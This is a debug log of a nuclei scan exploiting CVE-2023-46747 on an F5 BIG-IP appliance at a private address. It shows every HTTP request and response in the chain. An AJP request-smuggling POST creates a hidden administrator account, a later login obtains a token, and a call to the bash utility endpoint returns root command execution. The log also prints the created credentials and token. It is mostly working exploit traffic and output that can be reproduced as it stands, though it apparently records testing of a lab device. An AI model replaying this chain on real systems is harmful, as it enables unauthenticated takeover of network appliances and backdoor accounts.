nuclei -duc -ni -t CVE-2023-46747.yaml -u https://192.168.166.189 -vv -debug __ _ ____ __ _______/ /__ (_) / __ \/ / / / ___/ / _ \/ / / / / / /_/ / /__/ / __/ / /_/ /_/\__,_/\___/_/\___/_/ v3.0.2 projectdiscovery.io [INF] Current nuclei version: v3.0.2 (outdated) [INF] Current nuclei-templates version: v9.6.8 (latest) [INF] New templates added in latest release: 79 [INF] Templates loaded for current scan: 1 [WRN] Executing 1 unsigned templates. Use with caution. [INF] Targets loaded for current scan: 1 [CVE-2023-46747] F5 BIG-IP - Unauthenticated RCE via AJP Smuggling (@iamnoooob,@rootxharsh,@pdresearch) [critical] [INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/tmui/login.jsp POST /tmui/login.jsp HTTP/1.1 Host: 192.168.166.189 Transfer-Encoding: chunked, chunked Content-Type: application/x-www-form-urlencoded 204 HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP Tmui-Dubbuf BBBBBBBBBBB REMOTEROLE0 localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=YuCQ8&name_before=&passwd=dXRAig2X73Eb&passwd_before=&finished=x&finished_before= 0 [DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/tmui/login.jsp HTTP/1.1 200 OK Content-Length: 7019 Cache-Control: no-cache, must-revalidate, no-store Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1 Content-Type: text/html;charset=utf-8 Date: Tue, 31 Oct 2023 09:28:09 GMT F5-Login-Page: true Pragma: no-cache, no-cache Server: Apache Set-Cookie: JSESSIONID=0nidvojchWvoWlbkViLQr04BcbylONIX; Path=/tmui; Secure; HttpOnly; SameSite=Strict Strict-Transport-Security: max-age=16070400; includeSubDomains Vary: Accept-Encoding X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>BIG-IP® - demo-f55.com (192.168.166.189)</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta http-equiv="pragma" content="no-cache" /> <meta http-equiv="expires" content="-1" /> <meta name="copyright" content="(c) Copyright 1996-2021, F5 Networks, Inc., Seattle, Washington. All rights reserved." /> <meta name="description" content="BIG-IP® Configuration Utility" /> <meta name="author" content="F5 Networks, Inc." /> <meta name="robots" content="noindex,nofollow" /> <link rel="Shortcut Icon" type="image/x-icon" href="/xui/common/images/favicon.ico" /> <link rel="stylesheet" type="text/css" href="tmui/login/css/login.css?" /> <script type="text/javascript" src="/xui/common/scripts/utility.js?"></script> <script type="text/javascript" charset="utf-8"> // Break out of the XUI wrapper or frameset if (window.location != window.top.location) { window.top.location = window.location; } window.onload = function(e) { // Display error modal if necessary (but don't show it if they've failed authentication // because they just saw the message on the original page load). // Delete some state-preserving cookies if the user has logged out (doesn't have a BIGIPAuthCookie) // Also delete these state cookies if we're rebooting. var authCookieExists = false; //Delete partition & folder cookies, no matter what the situation, to handle cases // where the user's folder/partition permissions may have been changed. bug 415304 delCookie("F5_CURRENT_FOLDER"); delCookie("F5_CURRENT_PARTITION"); if ( !authCookieExists || window.location.pathname.indexOf('reboot') != -1) { deleteStatefulCookies(); } // Reboot if (window.location.pathname.indexOf('reboot') != -1) { frames['contentframe'].location.replace(path_rebootModal); document.getElementById('legallink').style.display = 'none'; } // Welcome else { frames['contentframe'].location.replace('/tmui/tmui/login/welcome.jsp'); var loginFormObj = document.getElementById('loginform'); loginFormObj.style.display = 'block'; var msgText; switch (getUrlValue('msgcode')) { case "1": msgText = 'Login failed'; break; case "2": msgText = 'Your credentials are no longer valid. Please log in again.'; break; case "3": msgText = 'You have been logged out. Please log in again.'; break; case "4": msgText = 'Remote authentication server unreachable; local authentication failed.'; break; case "5": msgText = 'Password changed successfully.'; break; } if (msgText) { var msgObj = document.getElementById('message'); msgObj.style.display = 'block'; msgObj.innerHTML = msgText; } // Focus on username field var usernameObj = document.getElementById('username'); usernameObj.focus(); if (usernameObj.select) { usernameObj.select(); } } }; function deleteStatefulCookies() { delCookie("F5_CURRENT_FOLDER"); delCookie("F5_CURRENT_PARTITION"); delCookie("f5_refreshpage"); delCookie("f5currenttab"); delCookie("f5formpage"); delCookie("f5mainmenuopenlist"); } function checkFormBeforeSubmit() { // delete any stateful cookies if the username being submitted is different than the previously logged-in user. var enteredUsername = document.getElementById('username').value; var previousUsername = ""; if (enteredUsername != previousUsername) { deleteStatefulCookies(); } return true; } </script> </head> <body> <div id="wrapper"> <div id="window"> <div id="banner"> <div id="logo"> <!--[if gt IE 6]><!--> <img src="tmui/login/images/logo_f5.png" alt="F5 Networks Logo"> <!--<![endif]--> <!--[if IE 6]> <img src="tmui/login/images/transparent.gif" style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='tmui/login/images/logo_f5.png',sizingMethod='auto');" alt="F5 Networks Logo"> <![endif]--> </div> <h1> BIG-IP Configuration Utility</h1> <h2>F5 Networks, Inc.</h2> </div> <div id="sidebar"> <div id="deviceinfo"> <label>Hostname</label> <p title="demo-f55.com">demo-f55.com</p> <label>IP Address</label> <p title="192.168.166.189">192.168.166.189</p> </div> <p id="message" class="badtext"></p> <form id="loginform" name="loginform" action="logmein.html?" method="POST" onsubmit="return checkFormBeforeSubmit();" style="display: none;"> <label>Username</label> <input type="text" class="login" name="username" id="username" tabindex="1" autocomplete="off" /> <label>Password</label> <input type="password" class="login" name="passwd" id="passwd" tabindex="2" autocomplete="off" /> <button type="submit" tabindex="3">Log in</button> </form> </div> <iframe src="/xui/common/blank.html" id="contentframe" name="contentframe" frameborder="no" scrolling="auto"></iframe> </div> <div id="copyright">(c) Copyright 1996-2021, F5 Networks, Inc., Seattle, Washington. All rights reserved.<br /> <a id="legallink" href="tmui/login/legal.html" target="contentframe" class="smalltext">F5 Networks, Inc. Legal Notices</a> </div> </div> <div id="modal" style="display: none;"> <div class="overlay"></div> <div class="content"> <p class="badtext">This BIG-IP system has encountered a configuration problem that may prevent the Configuration utility from functioning properly.</p> <p>To prevent adverse effects on the system, F5 Networks recommends that you restrict your use of the Configuration utility to critical tasks only until the problem is resolved. Beware that attempting to modify your configuration in this state with the Configuration utility may cause your configuration to be overwritten.</p> <button onclick="document.getElementById('modal').style.display='none';">Continue</button> </div> </div> </body> </html> [INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/auth/user/YuCQ8 PATCH /mgmt/tm/auth/user/YuCQ8 HTTP/1.1 Host: 192.168.166.189 User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Connection: close Content-Length: 32 Authorization: Basic WXVDUTg6ZFhSQWlnMlg3M0Vi Content-Type: application/json Accept-Encoding: gzip {"password": "RdU3yYZtXd6lnG"} [DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/auth/user/YuCQ8 HTTP/1.1 401 F5 Authorization Required Connection: close Content-Length: 381 Content-Type: text/html; charset=iso-8859-1 Date: Tue, 31 Oct 2023 09:28:09 GMT Server: Apache Strict-Transport-Security: max-age=16070400; includeSubDomains Www-Authenticate: Basic realm="Enterprise Manager" X-Frame-Options: SAMEORIGIN <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>401 Unauthorized</title> </head><body> <h1>Unauthorized</h1> <p>This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.</p> </body></html> [INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/shared/authn/login POST /mgmt/shared/authn/login HTTP/1.1 Host: 192.168.166.189 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 Connection: close Content-Length: 49 Content-Type: application/json Accept-Encoding: gzip {"username":"YuCQ8", "password":"dXRAig2X73Eb"} [DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/shared/authn/login HTTP/1.1 200 OK Connection: close Content-Length: 713 Cache-Control: no-store Cache-Control: no-cache Cache-Control: must-revalidate Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1 Content-Type: application/json; charset=UTF-8 Date: Tue, 31 Oct 2023 09:28:12 GMT Expires: -1 Pragma: no-cache Server: Jetty(9.2.22.v20170606) Strict-Transport-Security: max-age=16070400; includeSubDomains X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block {"username":"YuCQ8","loginReference":{"link":"https://localhost/mgmt/cm/system/authn/providers/local/login"},"loginProviderName":"local","token":{"token":"BMCMOHKUUQIWF547EFYUMY2JYF","name":"BMCMOHKUUQIWF547EFYUMY2JYF","userName":"YuCQ8","authProviderName":"local","user":{"link":"https://localhost/mgmt/shared/authz/users/YuCQ8"},"groupReferences":[],"timeout":1200,"startTime":"2023-10-31T02:28:12.327-0700","address":"192.168.166.168","partition":"[All]","generation":1,"lastUpdateMicros":1698744492325648,"expirationMicros":1698745692327000,"kind":"shared:authz:tokens:authtokenitemstate","selfLink":"https://localhost/mgmt/shared/authz/tokens/BMCMOHKUUQIWF547EFYUMY2JYF"},"generation":0,"lastUpdateMicros":0} [INF] [CVE-2023-46747] Dumped HTTP request for https://192.168.166.189/mgmt/tm/util/bash POST /mgmt/tm/util/bash HTTP/1.1 Host: 192.168.166.189 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 Connection: close Content-Length: 41 Content-Type: application/json X-F5-Auth-Token: BMCMOHKUUQIWF547EFYUMY2JYF Accept-Encoding: gzip {"command":"run","utilCmdArgs":"-c id"} [DBG] [CVE-2023-46747] Dumped HTTP response https://192.168.166.189/mgmt/tm/util/bash HTTP/1.1 200 OK Connection: close Content-Length: 167 Allow: Cache-Control: no-store Cache-Control: no-cache Cache-Control: must-revalidate Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data: http://127.4.1.1 http://127.4.2.1 Content-Type: application/json; charset=UTF-8 Date: Tue, 31 Oct 2023 09:28:12 GMT Expires: -1 Pragma: no-cache Server: Jetty(9.2.22.v20170606) Strict-Transport-Security: max-age=16070400; includeSubDomains X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block {"kind":"tm:util:bash:runstate","command":"run","utilCmdArgs":"-c id","commandResult":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"} [CVE-2023-46747:word-1] [http] [critical] https://192.168.166.189/mgmt/tm/util/bash [uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n,Username:YuCQ8,Password:dXRAig2X73Eb,Token:BMCMOHKUUQIWF547EFYUMY2JYF]Additional References: